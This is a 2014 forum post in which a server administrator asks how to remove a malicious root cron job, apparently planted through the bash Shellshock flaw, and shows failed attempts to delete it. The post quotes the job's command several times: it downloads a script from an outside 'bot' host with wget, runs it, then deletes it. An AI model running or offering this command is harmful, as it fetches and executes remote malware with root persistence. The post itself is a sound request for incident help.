How can i remove the cron made by "stablehost" valenrabilty?
Posted: 2014/10/04 18:58:28
My box was just affected by
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
few hours ago. But i think i am safe now because my bash version is
It created a cron under root. In /var/spool/cron/root , it has above syntax.
I tried to use crontab -e, use webmin to disable/remove, and even hard delete but all with no luck.
Is there a way to disable or remove it?
Thanks.
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
few hours ago. But i think i am safe now because my bash version is
Code: Select all
[root@fr02 cron]# rpm -q bash
bash-4.1.2-15.el6_5.2.x86_64
Code: Select all
[root@fr02 cron]# crontab -l
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
[root@fr02 cron]#
Code: Select all
in /var/spool/cron/root
...
-rw------- 1 root root 104 Oct 4 09:11 root
...
[root@fr02 cron]# rm root
rm: remove regular file `root'? y
rm: cannot remove `root': Permission denied
[root@fr02 cron]# echo '' > root
-bash: root: Permission denied
Thanks.